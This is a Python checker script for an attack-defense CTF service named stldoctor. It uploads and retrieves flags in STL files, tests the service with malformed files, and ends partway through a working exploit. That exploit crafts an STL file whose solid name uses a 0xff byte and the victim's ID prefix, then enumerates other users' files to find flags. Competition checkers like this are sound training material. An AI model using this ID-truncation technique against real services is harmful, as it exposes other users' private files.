#!/usr/bin/env python3

import logging
import math
import os
import random
import re
import struct
import subprocess
import time

import numpy as np

logging.getLogger("_curses").setLevel(logging.CRITICAL)

from asyncio import StreamReader, StreamWriter
from asyncio.exceptions import TimeoutError
from io import BytesIO
from logging import LoggerAdapter
from typing import Any, Optional, Union, cast

from enochecker3 import (
    AsyncSocket,
    ChainDB,
    DependencyInjector,
    Enochecker,
    ExploitCheckerTaskMessage,
    GetflagCheckerTaskMessage,
    GetnoiseCheckerTaskMessage,
    InternalErrorException,
    MumbleException,
    PutflagCheckerTaskMessage,
    PutnoiseCheckerTaskMessage,
)
from enochecker3.utils import FlagSearcher, assert_in
from stl import mesh

rand = random.SystemRandom()
generic_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!"
script_path = os.path.dirname(os.path.realpath(__file__))

extra_models = []
for path in os.listdir(f"{script_path}/models"):
    if path.endswith(".stl"):
        extra_models.append(f"{script_path}/models/{path}")
assert len(extra_models) > 0

wordlist = [w for w in open(f"{script_path}/wordlist.txt").read().split() if w != ""]

prompt = b"\r$ "

exploit_0_file_prefix = b"""
solid test\xff"""
exploit_0_file_suffix = b"""
facet normal 0 0 1.0
outer loop
vertex 1 0 0
vertex 1 1 0
vertex 0 1 0
endloop
endfacet
endsolid
"""

checker = Enochecker("stldoctor", 9090)
app = lambda: checker.app


async def timed(promise: Any, logger: LoggerAdapter, ctx: str) -> Any:
    logger.debug("START: {}".format(ctx))
    start = time.time()
    result = await promise
    end = time.time()
    logger.debug("DONE: {} (took {:.3f} seconds)".format(ctx, end - start))
    return result


class Session:
    def __init__(self, socket: AsyncSocket, logger: LoggerAdapter) -> None:
        socket_tuple = cast(tuple[StreamReader, StreamWriter], socket)
        self.reader = socket_tuple[0]
        self.writer = socket_tuple[1]
        self.logger = logger
        self.closed = False

    async def __aenter__(self) -> "Session":
        self.logger.debug("Preparing session")
        await self.prepare()
        return self

    async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
        self.logger.debug("Closing session")
        await self.close()

    async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
        try:
            ctxstr = f"readuntil {target!r}" if ctx is None else ctx
            data = await timed(self.reader.readuntil(target), self.logger, ctx=ctxstr)
            msg = f"read: {data[:100]!r}{'..' if len(data) > 100 else ''}"
            self.logger.debug(msg)
            return data
        except TimeoutError:
            self.logger.critical(f"Service timed out while waiting for {target!r}")
            raise MumbleException("Service took too long to respond")

    async def readline(self, ctx: Optional[str] = None) -> bytes:
        return await self.readuntil(b"\n", ctx=ctx)

    async def read(self, n: int, ctx: Optional[str] = None) -> bytes:
        try:
            ctxstr = f"reading {n} bytes" if ctx is None else ctx
            data = await timed(self.reader.readexactly(n), self.logger, ctx=ctxstr)
            msg = f"read: {data[:60]!r}{'..' if len(data) > 60 else ''}"
            self.logger.debug(msg)
            return data
        except TimeoutError:
            self.logger.critical(f"Service timed out while reading {n} bytes")
            raise MumbleException("Service took too long to respond")

    async def drain(self) -> None:
        await self.writer.drain()

    def write(self, data: bytes) -> None:
        msg = f"write: {data[:60]!r}{'..' if len(data) > 60 else ''}"
        self.logger.debug(msg)
        self.writer.write(data)

    async def prepare(self) -> None:
        await self.readuntil(prompt)

    async def exit(self) -> None:
        if self.closed:
            return
        self.write(b"exit\n")
        await self.drain()
        await self.readuntil(b"bye!")
        await self.close()

    async def close(self) -> None:
        if self.closed:
            return
        self.closed = True
        self.writer.close()
        await self.writer.wait_closed()

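# Sessions are provided via dependency injection (see _get_session below) and
# consume the initial prompt while being prepared. A minimal usage sketch,
# mirroring how the service functions further down drive a session:
#
#     session = await di.get(Session)
#     session.write(b"list\n")
#     await session.drain()
#     resp = await session.readuntil(prompt)
#     await session.exit()
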
@checker.register_dependency
def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
    return Session(socket, logger)


def includes_all(resp: bytes, targets: list[bytes]) -> bool:
    for m in targets:
        if m not in resp:
            return False
    return True


def includes_any(resp: bytes, targets: list[bytes]) -> bool:
    for m in targets:
        if m in resp:
            return True
    return False


def nnt(ino: Optional[tuple[bytes, bytes]]) -> tuple[bytes, bytes]:
    assert ino is not None
    return ino


def nnb(ino: Optional[bytes]) -> bytes:
    assert ino is not None
    return ino


def randbool() -> bool:
    return rand.randint(0, 1) == 1


def leetify(clean: str) -> str:
    conv = {
        "O": "0",
        "l": "1",
        "I": "1",
        "Z": "2",
        "E": "3",
        "A": "4",
        "S": "5",
        "G": "6",
        "T": "7",
    }
    out = [c.upper() if randbool() else c for c in clean.lower()]
    return "".join([conv[c] if c in conv else c for c in out])


def fakeid(minlen: int = 25, maxlen: int = 50) -> bytes:
    choice = rand.randint(0, 2)
    if choice == 0:  # most random without hurting parsing
        idlen = rand.randint(minlen, maxlen)
        return bytes([rand.randint(33, 127) for i in range(idlen)])
    elif choice == 1:  # a cat walking across the keyboard
        idlen = rand.randint(minlen, maxlen)
        alph = b"0123456789abcdefghijklmopqrstuvwxyz"
        return bytes([rand.choice(alph) for i in range(idlen)])
    else:  # a hacker band name
        idstr = b""
        while len(idstr) < minlen:
            word = rand.choice(wordlist)
            if idstr != b"":
                idstr += b"-"
            idstr += leetify(word).encode()
        idstr += b"-" + leetify(rand.choice(wordlist)).encode()
        return idstr[:maxlen]


def fakeids(n: int) -> list[bytes]:
    return [fakeid() for i in range(n)]


def approx_equal(f1: float, f2: float, precision: int = 2) -> bool:
    return round(f1, precision) == round(f2, precision)


def reverse_hash(hashstr: str) -> bytes:
    data = subprocess.check_output([f"{script_path}/revhash/revhash", hashstr])[:-1]
    if data == b"":
        raise InternalErrorException(f"Failed to find hash preimage of {hashstr!r}")
    return data


def parse_int(intstr: Union[str, bytes]) -> Optional[int]:
    try:
        return int(intstr)
    except ValueError:
        return None


def parse_float(floatstr: Union[str, bytes]) -> Optional[float]:
    try:
        return float(floatstr)
    except ValueError:
        return None


def has_alph(data: Union[str, bytes], alph: Union[str, bytes]) -> bool:
    return len([v for v in data if v not in alph]) == 0


def assert_match(data: bytes, pattern: bytes, raiser: Any) -> bytes:
    rem = re.search(pattern, data)
    if rem is None:
        raise raiser(f"Expected pattern {pattern!r} to match {data!r}")
    if len(rem.groups()) > 0:
        return rem.group(1)
    return rem.group(0)

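# For reference: shape of the ASCII STL files produced by genfile_ascii below
# (indentation is randomized on purpose):
#
#   solid <solidname>
#   <indent>facet normal <nx> <ny> <nz>
#   <indent><indent>outer loop
#   <indent><indent><indent>vertex <x> <y> <z>     (three per facet)
#   <indent><indent>endloop
#   <indent>endfacet
#   endsolid <solidname>
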
def genfile_ascii(solidname: bytes, malformed: Optional[int] = None) -> bytes:
    # Generate a valid ascii STL file or one that is malformed in a
    # way that it can't be interpreted by the service, but might succeed
    # with typical stl parsing libraries (as a means to identify them)
    indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))])
    facet_count = rand.randint(4, 30)

    if len(solidname) != 0:
        content = b"solid " + solidname + b"\n"
    else:
        content = b"solid\n"

    for fi in range(facet_count):
        # MALFORM 1: prefix keyword
        if malformed == 1:
            content += indent * 1 + b"facet norm"
        else:
            content += indent * 1 + b"facet normal "
        vs = [[rand.random() for i in range(3)] for k in range(3)]
        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
        norm = norm / np.linalg.norm(norm)
        content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n"

        # MALFORM 2: too many spaces
        if malformed == 2:
            content += indent * 2 + b"outer  loop\n"  # note the doubled space
        else:
            content += indent * 2 + b"outer loop\n"
        for i in range(3):
            content += (
                indent * 3
                + b"vertex "
                + " ".join([f"{v:.2f}" for v in vs[i]]).encode()
                + b"\n"
            )
        content += indent * 2 + b"endloop\n"
        content += indent + b"endfacet\n"

    # MALFORM 3: different endsolid name
    if malformed == 3:
        content += b"endsolid end\n"
    if solidname != b"":
        content += b"endsolid " + solidname + b"\n"
    else:
        content += b"endsolid\n"

    return content


def genfile_bin(solidname: bytes, malformed: Optional[int] = None) -> bytes:
    # Generate a valid binary STL file or one that is malformed in a
    # way that it can't be interpreted by the service, but might succeed
    # with typical stl parsing libraries (as a means to identify them)
    facet_count = rand.randint(4, 30)

    if len(solidname) > 78:
        raise InternalErrorException(
            "Solidname to embed in header is larger than header itself"
        )

    if solidname != b"":
        content = b"#" + solidname.ljust(78, b"\x00") + b"\x00"
    else:
        content = b"#" + b"\x00" * 79

    # The body below follows the standard binary STL layout (80-byte header,
    # uint32 facet count, then 12 little-endian floats plus a uint16 attribute
    # byte count per facet). Malform variants 2 and 3 are reconstructions: any
    # deviation the service rejects but lenient parsers accept will do.
    # MALFORM 1: specify more facets than are in the file
    if malformed == 1:
        content += struct.pack("<I", facet_count + rand.randint(3, 7))
    else:
        content += struct.pack("<I", facet_count)

    for fi in range(facet_count):
        vs = [[rand.random() for i in range(3)] for k in range(3)]
        norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2], vs[0]))
        norm = norm / np.linalg.norm(norm)
        content += b"".join([struct.pack("<f", v) for v in norm])
        for i in range(3):
            content += b"".join([struct.pack("<f", v) for v in vs[i]])
        # MALFORM 2 (reconstructed): nonzero attribute byte count
        if malformed == 2:
            content += struct.pack("<H", rand.randint(1, 0xFFFF))
        else:
            content += struct.pack("<H", 0)

    # MALFORM 3 (reconstructed): trailing bytes after the last facet
    if malformed == 3:
        content += bytes([rand.randint(0, 255) for i in range(rand.randint(4, 30))])

    return content


def genfile(solidname: bytes, filetype: str, malformed: Optional[int] = None) -> bytes:
    if filetype == "ascii":
        return genfile_ascii(solidname, malformed=malformed)
    elif filetype == "bin":
        return genfile_bin(solidname, malformed=malformed)
    elif filetype == "garbage":
        return bytes([rand.randint(0, 255) for i in range(rand.randint(100, 600))])
    else:
        raise InternalErrorException("Invalid file type supplied")


def getfile(filetype: str) -> tuple[bytes, bytes]:
    if filetype == "ascii":
        if rand.randint(0, 20) >= 5:
            solidname = fakeid()
            stlfile = genfile(solidname, "ascii")
        else:
            model = rand.choice([v for v in extra_models if v.endswith("-ascii.stl")])
            stlfile = open(model, "rb").read()
            solidname = fakeid()
            stlfile = stlfile.replace(b"OpenSCAD_Model", solidname)
    else:
        if rand.randint(0, 20) >= 5:
            solidname = fakeid()
            stlfile = genfile(solidname, "bin")
        else:
            model = rand.choice([v for v in extra_models if v.endswith("-bin.stl")])
            stlfile = open(model, "rb").read()
            solidname = fakeid(minlen=14, maxlen=14)
            stlfile = b"#" + solidname + stlfile[15:]  # replaces b"OpenSCAD Model\n"
    return stlfile, solidname


def parse_stlinfo(stlfile: bytes) -> Any:
    fakefile = BytesIO()
    fakefile.write(stlfile)
    fakefile.seek(0)
    try:
        name, data = mesh.Mesh.load(fakefile)
        meshinfo = mesh.Mesh(data, True, name=name, speedups=True)  # type: ignore
    except Exception as e:
        raise InternalErrorException(f"Unable to parse generated STL file: {e}")
    bmin = [math.inf for i in range(3)]
    bmax = [-math.inf for i in range(3)]
    if len(meshinfo.points) == 0:
        raise InternalErrorException("Parsed STL mesh has 0 points!")
    for p in meshinfo.points:
        for k in range(3):
            for i in range(3):
                bmin[k] = min(bmin[k], float(p[3 * i + k]))
                bmax[k] = max(bmax[k], float(p[3 * i + k]))
    info = {
        "points": meshinfo.points,
        "bb_origin": bmin,
        "bb_size": [bmax[i] - bmin[i] for i in range(3)],
        "size": len(stlfile),
        "triangle_count": len(meshinfo.points),
    }
    return info


async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]:
    try:
        return await db.get(key)
    except KeyError:
        raise MumbleException(
            "Could not retrieve necessary info for service interaction"
        )

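# The service exposes a line-based CLI behind a "\r$ " prompt. The functions
# below drive the commands used by the checker (summary inferred from the
# interactions, not an authoritative protocol description):
#
#   auth           - prompts for a password, replies "Logged in with ID <id>!"
#                    ("Welcome back" marks an existing user)
#   list           - lists the private files of the authenticated user
#   upload         - asks for model name, byte size and raw file contents
#   search <name>  - prints matching hashes, then serves info and an optional
#                    download per selected hash
#   exit           - closes the session with "bye!"
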
# SERVICE FUNCTIONS #


async def do_auth(
    session: Session, authstr: bytes, check: bool = True, newuser: bool = True
) -> Optional[bytes]:
    # Login with authstr
    session.write(b"auth\n")
    session.write(authstr + b"\n")
    await session.drain()

    # Check for errors
    resp = await session.readuntil(prompt, ctx="reading auth response")
    if b"ERR:" in resp:
        if check:
            session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}")
            raise MumbleException("Authentication not working properly")
        return None

    # Also check success message
    try:
        userid = resp.split(b"!", 1)[0].split(b"Logged in with ID ", 1)[1]
    except IndexError:
        session.logger.critical(f"Login with pass {authstr!r} failed:\n{resp!r}")
        raise MumbleException("Authentication not working properly")

    # Check whether the user is new
    is_newuser = b"Welcome back" not in resp
    if is_newuser != newuser:
        if check:
            if newuser:
                session.logger.critical("Unexpectedly, user dir exists already!")
            else:
                session.logger.critical("Unexpectedly, user dir doesn't exist!")
            raise MumbleException("Authentication not working properly")
        return None

    session.logger.debug(f"Logged in as user: {userid!r}")
    return userid


async def do_list(session: Session, check: bool = True) -> Optional[bytes]:
    session.write(b"list\n")
    await session.drain()

    # Check for errors
    resp = await session.readuntil(prompt, ctx="reading list response")
    if b"ERR:" in resp and b">> " not in resp:
        if check:
            session.logger.critical(f"Failed to list private files:\n{resp!r}")
            raise MumbleException("File listing not working properly")
        return None

    return resp


async def do_upload(
    session: Session,
    modelname: bytes,
    stlfile: bytes,
    check: bool = True,
) -> Optional[bytes]:
    session.logger.debug(f"Uploading model with name {modelname!r}")

    # Start upload and enter name
    session.write(b"upload\n")
    session.write(modelname + b"\n")
    await session.drain()

    # Check for error with name
    await session.readuntil(b"name: ")
    resp = await session.read(4, ctx="checking for err response")
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Failed during name check: {resp!r}")
            raise MumbleException("File upload not working properly")
        return None

    # Write size and contents in together
    await session.readuntil(b"size: ")
    session.write(f"{len(stlfile)}\n".encode())
    session.write(stlfile)
    await session.drain()

    # Check for error with size
    resp = await session.read(4, ctx="checking for err response")
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Failed during size check: {resp!r}")
            raise MumbleException("File upload not working properly")
        return None

    # Check for error with file
    await session.readuntil(b"listening..\n")
    resp = await session.readline()
    if b"ERR:" in resp:
        if check:
            session.logger.critical(f"Failed during stl parsing: {resp!r}")
            raise MumbleException("File upload not working properly")
        await session.readuntil(prompt)
        return None

    # Parse returned id
    try:
        modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
        if modelid == b"":
            raise Exception
    except Exception:
        session.logger.critical(f"Invalid model ID in upload response:\n{resp!r}")
        raise MumbleException("File upload not working properly")

    session.logger.debug(f"Uploaded model with id {modelid!r}")
    await session.readuntil(prompt, ctx="waiting for prompt")
    return modelid

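# do_search below parses an exchange of roughly this shape (a sketch derived
# from the reads/writes in the function, not a verbatim transcript):
#
#   $ search <modelname>
#   <hash-1>
#   ...
#   > Enter hash [q to quit]: <hash-n>        <- most recent result is chosen
#   (download y/n answered immediately)
#   ... info block ... ==================
#   Here you go.. (<size>B)                   <- only when downloading
#   <size raw bytes>
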
async def do_search(
    session: Session,
    modelname: bytes,
    download: bool = False,
    check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
    session.logger.debug(f"Retrieving model with name {modelname!r}")

    # Get possible hashes
    session.write(b"search " + modelname + b"\n")
    await session.drain()

    # Check for error with search query
    resp = await session.read(4)
    if resp == b"ERR:":
        resp += await session.readuntil(prompt)
        if check:
            session.logger.critical(
                f"Failed to retrieve model {modelname!r}:\n{resp!r}"
            )
            raise MumbleException("File search not working properly")
        return None

    # Collect results
    resp += await session.readuntil(b"quit]: ")
    try:
        resp = resp.split(b">")[0]
    except Exception:
        session.logger.critical('Search response missing b">" delim')
        raise MumbleException("File search not working properly")
    results = [l.strip() for l in resp.split(b"\n") if l.strip() != b""]

    # Request most recent result (later in index file)
    session.write(results[-1] + b"\n")
    session.write(b"y\n" if download else b"n\n")
    await session.drain()

    # Check for error in hash provided
    resp = await session.read(4)
    if resp == b"ERR:":
        # Cleanup download y/n interpreted as command
        await session.readuntil(prompt)
        if check:
            session.logger.critical(f"Error selecting file: {results[-1]!r}")
            raise MumbleException("File search not working properly")
        return None

    fileinfo = resp + await session.readuntil(
        b"================== \n", ctx="reading stl info"
    )

    stlfile = b""
    if download:
        # Parse file contents
        await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
        resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)")
        resp = resp[:-3]
        size = parse_int(resp)
        if size is None:
            raise MumbleException(f"Invalid download size: {resp!r}")
        session.logger.debug(f"Download size: {size}")
        stlfile = await session.read(size, ctx="reading stl contents")

    # Only one result
    session.write(b"q\n")
    await session.drain()

    # Cleanup..
    await session.readuntil(prompt)

    return fileinfo, stlfile


# CHECK WRAPPERS #


async def check_listed(session: Session, includes: list[bytes]) -> bytes:
    resp = nnb(await do_list(session, check=True))
    if not includes_all(resp, includes):
        session.logger.critical(f"Failed to find {includes} in listing:\n{resp!r}")
        raise MumbleException("File listing not working properly")
    return resp


async def check_not_listed(
    session: Session,
    excludes: list[bytes],
    fail: bool = False,
) -> Optional[bytes]:
    resp = await do_list(session, check=False)
    if resp is not None:
        if fail:
            session.logger.critical(f"Expected list to fail, but returned:\n{resp!r}")
            raise MumbleException("File listing not working properly")
        if includes_any(resp, excludes):
            session.logger.critical(
                f"Unexpectedly found one of {excludes} in listing:\n{resp!r}"
            )
            raise MumbleException("File listing not working properly")
    elif not fail:
        session.logger.critical(f"list failed unexpectedly:\n{resp!r}")
        raise MumbleException("File listing not working properly")
    return resp


async def check_in_search(
    session: Session,
    modelname: bytes,
    includes: list[bytes],
    download: bool = False,
) -> tuple[bytes, bytes]:
    resp = nnt(await do_search(session, modelname, download, check=True))
    if not includes_all(resp[0] + resp[1], includes):
        session.logger.critical(
            f"Retrieved info for {modelname!r} is missing {includes}: {resp[0] + resp[1]!r}"
        )
        raise MumbleException("File search not working properly")
    return resp


async def check_not_in_search(
    session: Session,
    modelname: bytes,
    excludes: list[bytes],
    download: bool = False,
    fail: bool = False,
) -> Optional[tuple[bytes, bytes]]:
    resp = await do_search(session, modelname, download, check=False)
    if resp is not None:
        combined = resp[0] + resp[1]
        if fail:
            session.logger.critical(
                f"Search for {modelname!r} succeeded unexpectedly:\n{combined!r}"
            )
            raise MumbleException("File search not working properly")
        if includes_any(combined, excludes):
            session.logger.critical(
                f"Unexpectedly {modelname!r} info contains one of {excludes}: {combined!r}"
            )
            raise MumbleException("File search not working properly")
    elif not fail:
        session.logger.critical(f"Search for {modelname!r} failed unexpectedly")
        raise MumbleException("File search not working properly")
    return resp


def check_hash(hashstr: bytes) -> None:
    if not has_alph(hashstr, b"0123456789abcdef"):
        raise MumbleException("Invalid model hash format returned")

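# check_stlinfo matches the info block against these line patterns (taken
# directly from the regexes below):
#
#   File Size: <n>
#   Triangle Count: <n>
#   Bounding Box Size: <x> x <y> x <z>
#   Bounding Box Origin: <x> x <y> x <z>
#   Model Name: <name>
#   Model ID: <id>
#   Solid Name: <solid>
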
def check_stlinfo(
    logger: LoggerAdapter,
    resp: bytes,
    ref_info: Any,
    ref_modelid: Optional[bytes] = None,
    ref_modelname: Optional[bytes] = None,
    ref_solidname: Optional[bytes] = None,
) -> None:
    def logthrow(msg: str) -> None:
        logger.critical(msg)
        raise MumbleException("STL parsing not working properly")

    size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException))
    if not size or size != ref_info["size"]:
        logthrow(
            f"STL info returned no / invalid file size: {size} != {ref_info['size']}"
        )

    triangle_count = parse_int(
        assert_match(resp, b"Triangle Count: (.*)\n", MumbleException)
    )
    if not triangle_count or triangle_count != ref_info["triangle_count"]:
        logthrow(
            f"STL info returned no / invalid triangle count: "
            f"{triangle_count} != {ref_info['triangle_count']}"
        )

    bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException)
    bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
    for i in range(3):
        val = bb_size[i]
        if val is None:
            logthrow(f"STL info returned invalid bounding box size: {bb_size_str!r}")
        elif not approx_equal(val, ref_info["bb_size"][i]):
            logthrow(
                f"Bounding box size doesn't match: (REF) {ref_info['bb_size']} {bb_size}"
            )

    bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException)
    bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
    for i in range(3):
        val = bb_origin[i]
        if val is None:
            logthrow(
                f"STL info returned invalid bounding box origin: {bb_origin_str!r}"
            )
        elif not approx_equal(val, ref_info["bb_origin"][i]):
            logthrow(
                f"Bounding box origin doesn't match: (REF) {ref_info['bb_origin']} {bb_origin}"
            )

    if ref_modelname:
        modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException)
        if modelname != ref_modelname:
            logthrow(f"Got modelname {modelname!r}, expected {ref_modelname!r}")

    if ref_modelid:
        modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException)
        if modelid != ref_modelid:
            logthrow(f"Got modelid {modelid!r}, expected {ref_modelid!r}")

    if ref_solidname:
        solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException)
        if solidname != ref_solidname:
            logthrow(f"Got solidname {solidname!r}, expected {ref_solidname!r}")


# TEST METHODS #


async def test_good_upload(di: DependencyInjector, filetype: str) -> None:
    modelname = fakeid()
    stlfile, solidname = getfile(filetype)
    ref = parse_stlinfo(stlfile)

    # Upload file, get it with search, verify returned info
    session = await di.get(Session)
    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    expected = [modelname, solidname, stlfile, modelid]
    info, stl = await check_in_search(session, modelname, expected, download=True)
    check_stlinfo(
        session.logger,
        info,
        ref,
        ref_modelname=modelname,
        ref_modelid=modelid,
        ref_solidname=solidname,
    )

async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None:
    modelname, solidname = fakeids(2)
    stlfile = genfile(solidname, filetype, malformed=variant)

    # Ensure a malformed file causes an error
    session = await di.get(Session)
    resp = await do_upload(session, modelname, stlfile, check=False)
    if resp is not None:
        session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
        raise MumbleException("Upload validation not working properly")


async def test_hash_collision(di: DependencyInjector) -> None:
    # See if using a random string we hit a hash collision for search / auth
    session = await di.get(Session)
    sresp = await do_search(session, fakeid(), download=False, check=False)
    if sresp is not None:
        session.logger.critical("File search succeeded on random file")
        raise MumbleException("Hash function not working properly")
    aresp = await do_auth(session, fakeid(), check=False, newuser=False)
    if aresp is not None:
        session.logger.critical("Auth succeeded for user with random str")
        raise MumbleException("Hash function not working properly")


# CHECKER METHODS #


@checker.putflag(0)
async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> str:
    modelname = fakeid()
    stlfile = genfile(task.flag.encode(), "ascii")
    db = await di.get(ChainDB)

    # Generate a file with flag in solidname and upload it (unregistered, ascii)
    session = await di.get(Session)
    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    await db.set("info", (modelname, modelid))

    return "Model {}.. is kinda sus".format(modelid[:10].decode())

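# The attack-info string returned above is handed to the exploit methods as
# task.attack_info; they recover the ten-character prefix embedded in it via
# attack_info.split()[1][:-2] (dropping the trailing "..").
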
@checker.putflag(1)
async def putflag_private(
    task: PutflagCheckerTaskMessage, di: DependencyInjector
) -> str:
    modelname, authstr = fakeids(2)
    stlfile = genfile(task.flag.encode(), "bin")
    db = await di.get(ChainDB)

    # Generate a file with flag in solidname and upload it (registered, bin)
    session = await di.get(Session)
    userid = nnb(await do_auth(session, authstr, check=True, newuser=True))
    modelid = nnb(await do_upload(session, modelname, stlfile, check=True))
    await db.set("info", (modelname, modelid, authstr))

    return "User {}.. is kinda sus".format(userid[:10].decode())


@checker.getflag(0)
async def getflag_unregistered(
    task: GetflagCheckerTaskMessage, di: DependencyInjector
) -> None:
    db = await di.get(ChainDB)
    modelname, modelid = await getdb(db, "info")

    # Search for flag file and verify flag is included
    session = await di.get(Session)
    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")


@checker.getflag(1)
async def getflag_registered(
    task: GetflagCheckerTaskMessage, di: DependencyInjector
) -> None:
    db = await di.get(ChainDB)
    modelname, modelid, authstr = await getdb(db, "info")

    # Authenticate, get flag via search and list
    session = await di.get(Session)
    await do_auth(session, authstr, check=True, newuser=False)
    sresp = nnt(await do_search(session, modelname, download=True, check=True))
    assert_in(task.flag.encode(), sresp[0] + sresp[1], "Failed to retrieve flag")
    lresp = nnb(await do_list(session, check=True))
    assert_in(task.flag.encode(), lresp, "Failed to retrieve flag")


@checker.putnoise(0)
async def putnoise_unregistered(
    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
) -> None:
    modelname = fakeid()
    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    db = await di.get(ChainDB)

    # Upload file for later checking
    session = await di.get(Session)
    modelid = await do_upload(session, modelname, stlfile, check=True)
    await db.set("info", (modelid, modelname, solidname, stlfile))


@checker.putnoise(1)
async def putnoise_registered(
    task: PutnoiseCheckerTaskMessage, di: DependencyInjector
) -> None:
    modelname, authstr = fakeids(2)
    stlfile, solidname = getfile("ascii" if randbool() else "bin")
    db = await di.get(ChainDB)

    # Upload private file for later checking
    session = await di.get(Session)
    await do_auth(session, authstr, check=True, newuser=True)
    modelid = await do_upload(session, modelname, stlfile, check=True)
    await db.set("info", (modelid, modelname, solidname, stlfile, authstr))


@checker.getnoise(0)
async def getnoise_unregistered(
    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
) -> None:
    db = await di.get(ChainDB)
    modelid, modelname, solidname, stlfile = await getdb(db, "info")
    ref = parse_stlinfo(stlfile)
    session = await di.get(Session)

    # Check that search works on persisted file
    expected = [modelname, solidname, stlfile, modelid]
    info, stl = await check_in_search(session, modelname, expected, download=True)

    # Check that persisted file info is still valid
    check_stlinfo(
        session.logger,
        info,
        ref,
        ref_modelname=modelname,
        ref_modelid=modelid,
        ref_solidname=solidname,
    )


@checker.getnoise(1)
async def getnoise_registered(
    task: GetnoiseCheckerTaskMessage, di: DependencyInjector
) -> None:
    db = await di.get(ChainDB)
    modelid, modelname, solidname, stlfile, authstr = await getdb(db, "info")
    ref = parse_stlinfo(stlfile)
    session = await di.get(Session)

    # Check that auth works and tells us we are logging in again
    await do_auth(session, authstr, check=True, newuser=False)

    # Check that search works on persisted file
    expected = [modelname, solidname, stlfile, modelid]
    info, stl = await check_in_search(session, modelname, expected, download=True)

    # Check that persisted file info is still valid
    check_stlinfo(
        session.logger,
        info,
        ref,
        ref_modelname=modelname,
        ref_modelid=modelid,
        ref_solidname=solidname,
    )

    # Check that list works on persisted file
    await check_listed(session, [modelname, modelid + b"-", solidname])

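# Havoc variants: 0 and 4 run clean ascii/bin uploads, 1-3 and 5-7 run the
# malformed ascii/bin variants, 8 uploads garbage and 9 probes for cheap
# hash collisions.
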
@checker.havoc(0)
async def havoc_good_upload_ascii(di: DependencyInjector) -> None:
    await test_good_upload(di, "ascii")


@checker.havoc(1)
async def havoc_bad_upload_ascii_v1(di: DependencyInjector) -> None:
    await test_bad_upload(di, "ascii", 1)


@checker.havoc(2)
async def havoc_bad_upload_ascii_v2(di: DependencyInjector) -> None:
    await test_bad_upload(di, "ascii", 2)


@checker.havoc(3)
async def havoc_bad_upload_ascii_v3(di: DependencyInjector) -> None:
    await test_bad_upload(di, "ascii", 3)


@checker.havoc(4)
async def havoc_good_upload_bin(di: DependencyInjector) -> None:
    await test_good_upload(di, "bin")


@checker.havoc(5)
async def havoc_bad_upload_bin_v1(di: DependencyInjector) -> None:
    await test_bad_upload(di, "bin", 1)


@checker.havoc(6)
async def havoc_bad_upload_bin_v2(di: DependencyInjector) -> None:
    await test_bad_upload(di, "bin", 2)


@checker.havoc(7)
async def havoc_bad_upload_bin_v3(di: DependencyInjector) -> None:
    await test_bad_upload(di, "bin", 3)


@checker.havoc(8)
async def havoc_bad_upload_garbage(di: DependencyInjector) -> None:
    await test_bad_upload(di, "garbage", 1)


@checker.havoc(9)
async def havoc_hash_collision(di: DependencyInjector) -> None:
    await test_hash_collision(di)

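# Exploit 0 (prefix truncation): the solid name of the uploaded file smuggles
# in the victim's ID prefix behind a 0xff byte; "search last" then lists the
# matching cached entries, whose info blocks are scanned for the flag.
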
@checker.exploit(0)
async def exploit_prefix_truncation(
    task: ExploitCheckerTaskMessage, di: DependencyInjector
) -> bytes:
    modelname = fakeid()
    searcher = await di.get(FlagSearcher)

    # Generate exploit payload using attack_info
    assert task.attack_info is not None
    target_prefix = task.attack_info.split()[1][:-2].encode()
    evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix

    # Upload evil file
    session = await di.get(Session)
    await do_upload(session, modelname, stlfile=evil_file, check=True)
    await do_search(session, modelname, download=False, check=True)

    # Retrieve evil file for hash truncation
    session.write(b"search last\n")
    await session.drain()
    resp = await session.readline()
    if b"ERR:" in resp:
        raise MumbleException("Searching for cached entry fails!")
    resp += await session.readuntil(b"[q to quit]: ", ctx="reading search results")
    filelist = [l.strip() for l in resp.split(b"\n")[:-1] if l.strip() != b""]
    if len(filelist) == 0:
        raise MumbleException("Failed to list files through search")

    # Use it to enumerate other files and grab contents
    flag = None
    for fhash in filelist:
        session.write(fhash + b"\n")
        session.write(b"n\n")
        await session.drain()
        resp = await session.readline()
        if b"ERR:" in resp:
            session.logger.critical(f"Failed on selection of file: {resp!r}")
            raise MumbleException("Failed to retrieve file contents via exploit")
        resp += await session.readuntil(
            b"==================", ctx="getting file info (1)"
        )
